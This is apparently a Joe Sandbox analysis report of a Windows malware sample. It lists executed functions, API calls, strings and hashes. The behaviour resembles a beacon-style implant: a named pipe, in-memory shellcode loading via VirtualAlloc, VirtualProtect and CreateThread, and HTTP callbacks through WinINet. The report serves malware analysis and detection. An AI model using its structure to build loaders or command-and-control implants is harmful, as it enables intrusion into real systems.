37721 7ceaa8 _DllMainCRTStartup 41 API calls 37716->37721 37719->37716 37973 7c60e0 8 API calls 2 library calls 37720->37973 37721->37716 37722->37628 37723->37633 37724->37635 37725->37635 37727 7cf284 malloc 38 API calls 37726->37727 37728 7c600d 37727->37728 37729 7cf284 malloc 38 API calls 37728->37729 37732 7c6015 __crtGetStringTypeA_stat _DllMainCRTStartup 37728->37732 37730 7c6021 37729->37730 37730->37732 37842 7cf244 37730->37842 37732->37640 37734 7cf29c 37733->37734 37735 7cf318 37733->37735 37737 7cf2d4 HeapAlloc 37734->37737 37738 7cf2b4 37734->37738 37742 7cf2fd 37734->37742 37747 7cf302 37734->37747 37852 7d1db4 DecodePointer 37734->37852 37855 7d1db4 DecodePointer 37735->37855 37737->37734 37743 7cf30d 37737->37743 37738->37737 37849 7d1df0 34 API calls 2 library calls 37738->37849 37850 7d1e64 34 API calls 7 library calls 37738->37850 37851 7cff54 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 37738->37851 37739 7cf31d 37856 7d1d18 8 API calls _getptd_noexit 37739->37856 37853 7d1d18 8 API calls _getptd_noexit 37742->37853 37743->37642 37854 7d1d18 8 API calls _getptd_noexit 37747->37854 37857 7d145c GetSystemTimeAsFileTime 37750->37857 37755 7cf284 malloc 38 API calls 37757 7cc2a1 _setmbcp __crtGetStringTypeA_stat 37755->37757 37758 7cc30a 37757->37758 37862 7d181c 37757->37862 37759 7d181c strtok 47 API calls 37758->37759 37760 7bcb87 37759->37760 37761 7c34a0 37760->37761 37762 7d145c _time64 GetSystemTimeAsFileTime 37761->37762 37763 7c34b3 37762->37763 37764 7d044c _DllMainCRTStartup 44 API calls 37763->37764 37765 7c34bb _DllMainCRTStartup 37764->37765 37904 7c2f5c 37765->37904 37768 7ceaa8 37769 7ceafd __crtGetStringTypeA_stat 37768->37769 37770 7ceae7 37768->37770 37769->37648 37771 7ceaff 37770->37771 37772 7ceaf3 37770->37772 37909 7d1914 41 API calls 5 library calls 37771->37909 37773 7cf284 malloc 38 API calls 37772->37773 37773->37769 37776 7bf3d4 _DllMainCRTStartup 37775->37776 37777 7bf3da GetLocalTime 37776->37777 37778 7bcbd4 37776->37778 37779 7bf408 _DllMainCRTStartup 37777->37779 37778->37653 37778->37655 37779->37778 37782 7bf20e _DllMainCRTStartup 37780->37782 37781 7bcc05 37781->37661 37781->37662 37782->37781 37910 7ca8dc 63 API calls _DllMainCRTStartup 37782->37910 37784 7bf248 37911 7ca914 62 API calls 3 library calls 37784->37911 37787 7bf299 _DllMainCRTStartup 37786->37787 37788 7bcc13 37787->37788 37789 7bf2eb htonl htonl 37787->37789 37788->37666 37788->37668 37789->37788 37790 7bf30b 37789->37790 37791 7cf284 malloc 38 API calls 37790->37791 37792 7bf315 _setmbcp _DllMainCRTStartup 37791->37792 37793 7bf36b __crtGetStringTypeA_stat 37792->37793 37912 7ca8dc 63 API calls _DllMainCRTStartup 37792->37912 37797 7cf244 free 8 API calls 37793->37797 37795 7bf34c 37913 7ca914 62 API calls 3 library calls 37795->37913 37797->37788 37799 7c5c88 getSystemCP 37798->37799 37914 7b1218 37799->37914 37803 7c5ca8 __security_init_cookie 37804 7c5cae GetTickCount 37803->37804 37805 7d044c _DllMainCRTStartup 44 API calls 37804->37805 37806 7c5cbf 37805->37806 37920 7bcfa4 CryptAcquireContextA CryptAcquireContextA CryptReleaseContext GetSystemTimeAsFileTime _DllMainCRTStartup 37806->37920 37808 7c5cc4 _DllMainCRTStartup 37809 7c5cec GetCurrentProcess 37808->37809 37810 7c5cfe 37808->37810 37957 7c0c64 GetModuleHandleA GetProcAddress 37809->37957 37921 7cdec8 CheckTokenMembership FreeSid _DllMainCRTStartup 37810->37921 37812 7c5cfa 37812->37810 37814 7c5d06 37922 7be2a8 htonl htonl 37814->37922 37816 7c5d1c 37923 7be200 htonl _setmbcp 37816->37923 37818 7c5d2f 37924 7be200 htonl _setmbcp 37818->37924 37820 7c5d3f 37925 7be200 htonl _setmbcp 37820->37925 37822 7c5d4f 37926 7be248 htonl htonl _DllMainCRTStartup 37822->37926 37824 7c5d5e __security_init_cookie 37927 7be248 htonl htonl _DllMainCRTStartup 37824->37927 37826 7c5d6f 37928 7be278 htonl _DllMainCRTStartup 37826->37928 37828 7c5d7a 37929 7be1e0 htonl _DllMainCRTStartup 37828->37929 37830 7c5d85 37930 7c5e28 37830->37930 37843 7cf249 HeapFree 37842->37843 37847 7cf279 realloc 37842->37847 37844 7cf264 37843->37844 37843->37847 37848 7d1d18 8 API calls _getptd_noexit 37844->37848 37846 7cf269 GetLastError 37846->37847 37847->37732 37848->37846 37849->37738 37850->37738 37852->37734 37853->37747 37854->37743 37855->37739 37856->37743 37858 7cc259 37857->37858 37859 7d044c 37858->37859 37871 7d5844 37859->37871 37863 7d5844 _getptd 44 API calls 37862->37863 37864 7d1840 37863->37864 37865 7d190e 37864->37865 37868 7d1861 37864->37868 37901 7d8c50 RtlCaptureContext RtlLookupFunctionEntry UnhandledExceptionFilter IsProcessorFeaturePresent __report_securityfailure 37865->37901 37867 7d1913 37892 7d7e20 37868->37892 37876 7d5868 GetLastError 37871->37876 37873 7d584f 37874 7cc261 37873->37874 37888 7d00b4 44 API calls 3 library calls 37873->37888 37874->37755 37889 7d40a8 37876->37889 37878 7d5885 37879 7d4728 _calloc_crt 6 API calls 37878->37879 37880 7d58d2 _getptd_noexit 37878->37880 37881 7d589a 37879->37881 37880->37873 37881->37880 37882 7d40c4 _CRT_INIT TlsSetValue 37881->37882 37883 7d58b0 37882->37883 37884 7d58cd 37883->37884 37885 7d58b7 _initptd 37883->37885 37886 7cf244 free 6 API calls 37884->37886 37887 7d58be GetCurrentThreadId 37885->37887 37886->37880 37887->37880 37890 7d40b8 37889->37890 37891 7d40bb TlsGetValue 37889->37891 37890->37891 37893 7d7e29 37892->37893 37894 7d8b7c IsProcessorFeaturePresent 37893->37894 37895 7d1903 37893->37895 37896 7d8b93 37894->37896 37895->37757 37902 7d3ffc RtlCaptureContext RtlLookupFunctionEntry __crtCaptureCurrentContext 37896->37902 37898 7d8ba6 37903 7d8b30 UnhandledExceptionFilter __raise_securityfailure __crtUnhandledException 37898->37903 37901->37867 37902->37898 37905 7bcb94 37904->37905 37907 7c2f87 _DllMainCRTStartup 37904->37907 37905->37768 37906 7cf284 malloc 38 API calls 37906->37907 37907->37905 37907->37906 37908 7ceaa8 _DllMainCRTStartup 41 API calls 37907->37908 37908->37907 37909->37769 37910->37784 37911->37781 37912->37795 37913->37793 37960 7b1184 CryptAcquireContextA 37914->37960 37917 7b1245 37919 7cb0b4 38 API calls _DllMainCRTStartup 37917->37919 37919->37803 37920->37808 37921->37814 37922->37816 37923->37818 37924->37820 37925->37822 37926->37824 37927->37826 37928->37828 37929->37830 37931 7c5fec _DllMainCRTStartup 38 API calls 37930->37931 37932 7c5e51 _DllMainCRTStartup 37931->37932 37933 7c5eb5 GetComputerNameA 37932->37933 37966 7bf008 37933->37966 37957->37812 37961 7b11c2 CryptAcquireContextA 37960->37961 37963 7b11e6 _DllMainCRTStartup 37960->37963 37962 7b120c 37961->37962 37961->37963 37962->37917 37965 7b10d0 GetSystemTimeAsFileTime clock 37962->37965 37964 7b11fd CryptReleaseContext 37963->37964 37964->37962 37965->37917 37974 7bf118 37967->37974 37969 7bf02f WSASocketA 37970 7bf058 WSAIoctl 37969->37970 37971 7bf051 _DllMainCRTStartup 37969->37971 37970->37971 37971->37713 37972->37716 37975 7bf12c _DllMainCRTStartup 37974->37975 37975->37969

                                            Executed Functions

                                            Function 00401180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 196sleepstringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 10 401180-4011ae 11 401460-401463 GetStartupInfoA 10->11 12 4011b4-4011d1 10->12 16 401470-40148a call 402e88 11->16 13 4011e9-4011f4 12->13 14 4011f6-401204 13->14 15 4011d8-4011db 13->15 19 401417-401426 call 402e90 14->19 20 40120a-40120e 14->20 17 401400-401411 15->17 18 4011e1-4011e6 Sleep 15->18 17->19 17->20 18->13 28 401229-40122b 19->28 29 40142c-401447 _initterm 19->29 24 401490-4014a9 call 402e80 20->24 25 401214-401223 20->25 36 4014ae-4014b6 call 402e60 24->36 25->28 25->29 31 401231-40123e 28->31 32 40144d-401452 28->32 29->31 29->32 33 401240-401248 31->33 34 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 31->34 32->31 33->34 48 4012b2-4012b8 34->48 49 40129b 34->49 50 4012a0-4012a2 48->50 51 4012ba-4012c8 48->51 52 4012f0-4012f6 49->52 56 4012a4-4012a7 50->56 57 4012e9 50->57 53 4012ae 51->53 54 4012f8-401302 52->54 55 40130e-401333 malloc 52->55 53->48 58 4013f0-4013f5 54->58 59 401308 54->59 60 401335-40133a 55->60 61 40137b-4013af call 401950 call 403040 55->61 62 4012d0-4012d2 56->62 63 4012a9 56->63 57->52 58->59 59->55 65 401340-401374 strlen malloc memcpy 60->65 72 4013b4-4013c2 61->72 62->57 64 4012d4 62->64 63->53 68 4012d8-4012e2 64->68 65->65 69 401376 65->69 68->57 71 4012e4-4012e7 68->71 69->61 71->57 71->68 72->36 73 4013c8-4013d0 72->73 73->16 74 4013d6-4013e5 73->74
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                            • String ID: 0PE$@6E$DCE
                                            • API String ID: 649803965-2430247936
                                            • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                                            • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
                                            • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
                                            • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348
                                            Function 007BE68C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 165networkfileCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • _snprintf.LIBCMT ref: 007BE725
                                              • Part of subcall function 007CF63C: _errno.LIBCMT ref: 007CF673
                                              • Part of subcall function 007CF63C: _invalid_parameter_noinfo.LIBCMT ref: 007CF67E
                                              • Part of subcall function 007C7B38: _snprintf.LIBCMT ref: 007C7CA5
                                            • _snprintf.LIBCMT ref: 007BE7BD
                                            • _snprintf.LIBCMT ref: 007BE7D4
                                            • HttpOpenRequestA.WININET ref: 007BE818
                                            • HttpSendRequestA.WININET ref: 007BE84A
                                            • InternetQueryDataAvailable.WININET ref: 007BE87A
                                            • InternetCloseHandle.WININET ref: 007BE898
                                              • Part of subcall function 007C2D70: strchr.LIBCMT ref: 007C2DD6
                                              • Part of subcall function 007C2D70: _snprintf.LIBCMT ref: 007C2E0C
                                              • Part of subcall function 007C2C0C: strchr.LIBCMT ref: 007C2C69
                                              • Part of subcall function 007C2C0C: _snprintf.LIBCMT ref: 007C2CB3
                                            • InternetReadFile.WININET ref: 007BE8D4
                                            • InternetCloseHandle.WININET ref: 007BE8F5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _snprintf$Internet$CloseHandleHttpRequeststrchr$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                                            • String ID: %s%s$*/*
                                            • API String ID: 3536628738-856325523
                                            • Opcode ID: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                            • Instruction ID: 00329cffa11bd0f90d5dc0ee30f6ceb416abb5c4c7fb549c31d2c2abd73062ef
                                            • Opcode Fuzzy Hash: 5c4b2c5719e067ce629add7012f112fb417b911470ce534f4123a2ba84123eb0
                                            • Instruction Fuzzy Hash: E0619C32B04B8586EB10DF61E844BEEA765F788B98F40412AEE4D57B59DF7CD50AC700
                                            Function 007C5E28 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                                            • String ID: %s%s%s
                                            • API String ID: 1671524875-1891519693
                                            • Opcode ID: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                            • Instruction ID: 70b582a96e72c2f25c08df51c883e000ca9fba081ecf088ab0ed7d6d21a338c0
                                            • Opcode Fuzzy Hash: 40ae984fd8d1d60e03acc18bee9c81741f4638c9dfd0547d5b2d8a001e524837
                                            • Instruction Fuzzy Hash: 5B41B42570468487EB08FB22E958BAF6795B789FD4F584128FE5A0BB56CF3CD542C700
                                            Function 007B1184 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39encryptionCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 182 7b1184-7b11c0 CryptAcquireContextA 183 7b11c2-7b11e4 CryptAcquireContextA 182->183 184 7b11e6-7b11f9 call 7e2020 182->184 183->184 185 7b120c-7b1216 183->185 188 7b11fb 184->188 189 7b11fd-7b120a CryptReleaseContext 184->189 188->189 189->185
                                            APIs
                                            • CryptAcquireContextA.ADVAPI32 ref: 007B11B8
                                            • CryptAcquireContextA.ADVAPI32 ref: 007B11DC
                                            • CryptGenRandom.ADVAPI32 ref: 007B11F0
                                            • CryptReleaseContext.ADVAPI32 ref: 007B1204
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Crypt$Context$Acquire$RandomRelease
                                            • String ID: ($Microsoft Base Cryptographic Provider v1.0
                                            • API String ID: 685801729-4046902070
                                            • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                            • Instruction ID: 072a972eb8ecbcb9654d24ef183b777390cc9da47bf4416ae473a25c01891f89
                                            • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                            • Instruction Fuzzy Hash: 34017536B0578482E710CF69E888799B761F7DCB84F848465C64D83765DF7CD64AC740
                                            Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50pipefileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 399 401630-40168d CreateNamedPipeA 400 4016dc-4016e5 399->400 401 40168f-4016a1 ConnectNamedPipe 399->401 401->400 402 4016a3-4016a5 401->402 403 4016c6-4016cf CloseHandle 402->403 404 4016a7-4016c4 WriteFile 402->404 403->400 404->403 405 4016d1-4016da 404->405 405->402
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                                            • String ID:
                                            • API String ID: 2239253087-0
                                            • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                                            • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
                                            • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
                                            • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08
                                            Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • malloc.MSVCRT ref: 004017B9
                                            • SleepEx.KERNELBASE ref: 004017CD
                                              • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
                                              • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
                                              • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
                                            • GetTickCount.KERNEL32 ref: 004017FC
                                            • CreateThread.KERNEL32 ref: 00401885
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
                                            • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
                                            • API String ID: 3660650057-1020837823
                                            • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                                            • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
                                            • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
                                            • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08
                                            Function 007BEA48 Relevance: 9.1, APIs: 6, Instructions: 109networkCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 007CE0FC: RevertToSelf.ADVAPI32 ref: 007CE10A
                                            • InternetOpenA.WININET ref: 007BEB0C
                                            • InternetSetOptionA.WININET ref: 007BEB2C
                                            • InternetSetOptionA.WININET ref: 007BEB44
                                            • InternetConnectA.WININET ref: 007BEB7A
                                            • InternetSetOptionA.WININET ref: 007BEBB7
                                            • InternetSetOptionA.WININET ref: 007BEBE2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$Option$ConnectOpenRevertSelf
                                            • String ID:
                                            • API String ID: 1513466045-0
                                            • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                            • Instruction ID: 367597635c703493c40462a2034accf43f7e8a535a2f5be997ce62af9637b4b0
                                            • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                            • Instruction Fuzzy Hash: A341D275A08BC282EB18DF51E499BBA7765F798B84F04402DEA4E17B26CF7CE516C700
                                            Function 007BCA74 Relevance: 7.8, APIs: 6, Instructions: 296COMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 228 7bca74-7bcbd6 call 7c5fec call 7c61e8 * 3 call 7cb454 call 7cb464 * 2 call 7cb434 * 2 call 7cb454 * 2 call 7cf284 call 7cb434 * 3 call 7cb464 call 7cc230 call 7c34a0 call 7ceaa8 * 2 call 7bf3c0 271 7bcbd8 call 7cda74 228->271 272 7bcbdd-7bcbf2 call 7cb434 call 7bf1e4 228->272 271->272 278 7bcbf9-7bcc07 call 7bf1f8 272->278 279 7bcbf4 call 7cda74 272->279 283 7bcc09 call 7cda74 278->283 284 7bcc0e-7bcc15 call 7bf274 278->284 279->278 283->284 288 7bcc1c-7bcc55 call 7cb464 call 7cb434 call 7cf284 284->288 289 7bcc17 call 7cda74 284->289 297 7bcc5c-7bcc90 call 7cb434 call 7ceaa8 call 7cb434 call 7c5c60 288->297 298 7bcc57 call 7cda74 288->298 289->288 308 7bcebb-7bcee7 call 7cc218 call 7cf244 call 7cda74 297->308 309 7bcc96-7bcc9d 297->309 298->297 310 7bcca2-7bcd24 call 7cbfc0 call 7cf63c call 7cbfc0 call 7cf63c * 2 call 7c2ee0 309->310 329 7bcd26-7bcd2a 310->329 330 7bcd44-7bcd77 call 7bea48 call 7cb434 call 7be9f4 310->330 332 7bcd2e-7bcd35 329->332 341 7bcd79-7bcd87 call 7cad44 330->341 342 7bcd9c-7bcd9f 330->342 332->332 334 7bcd37-7bcd3a 332->334 334->330 335 7bcd3c-7bcd3f call 7c31f4 334->335 335->330 351 7bcd89-7bcd93 call 7c8e0c 341->351 352 7bcd95-7bcd98 341->352 343 7bce26 342->343 344 7bcda5-7bcdc8 call 7c6b98 call 7cb434 342->344 347 7bce2c-7bce38 call 7be9c8 call 7bf3c0 343->347 359 7bcdca 344->359 360 7bcdcf-7bcdf0 call 7c18c4 call 7c5144 call 7c4a04 call 7bf3c0 344->360 362 7bce3a call 7cda74 347->362 363 7bce3f-7bce5d call 7cbf04 347->363 351->342 352->342 359->360 387 7bcdfa-7bce01 360->387 388 7bcdf2-7bcdf5 call 7bf484 360->388 362->363 370 7bce5f call 7cda74 363->370 371 7bce64-7bce6c 363->371 370->371 371->308 374 7bce6e-7bce76 371->374 376 7bce78-7bce89 374->376 377 7bcea4 call 7c211c 374->377 380 7bce8b-7bce9a call 7bf3a0 376->380 381 7bce9c 376->381 383 7bcea9-7bceb5 377->383 385 7bce9e-7bcea0 380->385 381->385 383->308 383->310 385->377 390 7bcea2 385->390 387->347 392 7bce03-7bce24 call 7be9c8 call 7bea48 call 7bec04 387->392 388->387 390->377 392->347
                                            APIs
                                              • Part of subcall function 007C5FEC: malloc.LIBCMT ref: 007C6008
                                            • malloc.LIBCMT ref: 007BCB3B
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                              • Part of subcall function 007CC230: _time64.LIBCMT ref: 007CC254
                                              • Part of subcall function 007CC230: malloc.LIBCMT ref: 007CC29C
                                              • Part of subcall function 007CC230: strtok.LIBCMT ref: 007CC300
                                              • Part of subcall function 007CC230: strtok.LIBCMT ref: 007CC311
                                              • Part of subcall function 007C34A0: _time64.LIBCMT ref: 007C34AE
                                              • Part of subcall function 007CEAA8: malloc.LIBCMT ref: 007CEAF8
                                              • Part of subcall function 007CEAA8: realloc.LIBCMT ref: 007CEB07
                                              • Part of subcall function 007BF3C0: GetLocalTime.KERNEL32 ref: 007BF3DF
                                            • malloc.LIBCMT ref: 007BCC4A
                                            • _snprintf.LIBCMT ref: 007BCCC1
                                            • _snprintf.LIBCMT ref: 007BCCE7
                                            • free.LIBCMT ref: 007BCEC6
                                              • Part of subcall function 007CAD44: malloc.LIBCMT ref: 007CAD78
                                              • Part of subcall function 007CAD44: free.LIBCMT ref: 007CAF2F
                                              • Part of subcall function 007C8E0C: htonl.WS2_32 ref: 007C8E3D
                                              • Part of subcall function 007C8E0C: htonl.WS2_32 ref: 007C8E4A
                                            • _snprintf.LIBCMT ref: 007BCD0E
                                              • Part of subcall function 007CDA74: Sleep.KERNEL32 ref: 007CDABC
                                              • Part of subcall function 007CDA74: ExitThread.KERNEL32 ref: 007CDAC6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc$_snprintf$_errno_time64freehtonlstrtok$AllocExitHeapLocalSleepThreadTime_callnewhrealloc
                                            • String ID:
                                            • API String ID: 548016584-0
                                            • Opcode ID: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                            • Instruction ID: d82d2695ff827594a388b677fa54f0363f13a7a491a421e530cbfe0e72ebe583
                                            • Opcode Fuzzy Hash: 2bc6c26e52030706472ef6675f80d589c4fc0031a0de3ea0680d9c9adc863854
                                            • Instruction Fuzzy Hash: 4EA1B161704681C6DB18FB72A85ABAE6395BB85780F44813CFE5A4B797DF3CD90AC700
                                            Function 007BF014 Relevance: 4.6, APIs: 3, Instructions: 66networkCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 406 7bf014-7bf04f call 7bf118 WSASocketA 409 7bf058-7bf097 WSAIoctl 406->409 410 7bf051-7bf053 406->410 412 7bf099-7bf0b0 409->412 413 7bf0b4-7bf0be 409->413 411 7bf0f6-7bf10a 410->411 412->413 414 7bf0eb-7bf0ee call 7e25e8 413->414 415 7bf0c0 413->415 420 7bf0f4 414->420 416 7bf0c5-7bf0cf 415->416 418 7bf0d1-7bf0d4 416->418 419 7bf0d6-7bf0e2 416->419 418->419 421 7bf0e6 418->421 419->414 422 7bf0e4 419->422 420->411 421->414 422->416
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: IoctlSocketStartupclosesocket
                                            • String ID:
                                            • API String ID: 365704328-0
                                            • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                            • Instruction ID: 0374cae734d916fdc1254a4c9a90b94c71797175e4d7ea6f4616b483c680d9d9
                                            • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                            • Instruction Fuzzy Hash: DB2190727087C482D7209F24F98079AB7A5F388BE4F548635EE9D43B9ADB3DC5468B00
                                            Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47memorythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 423 401595-4015c5 VirtualAlloc 424 4015c7-4015c9 423->424 425 4015e0-40162c call 401563 VirtualProtect CreateThread 424->425 426 4015cb-4015de 424->426 426->424
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
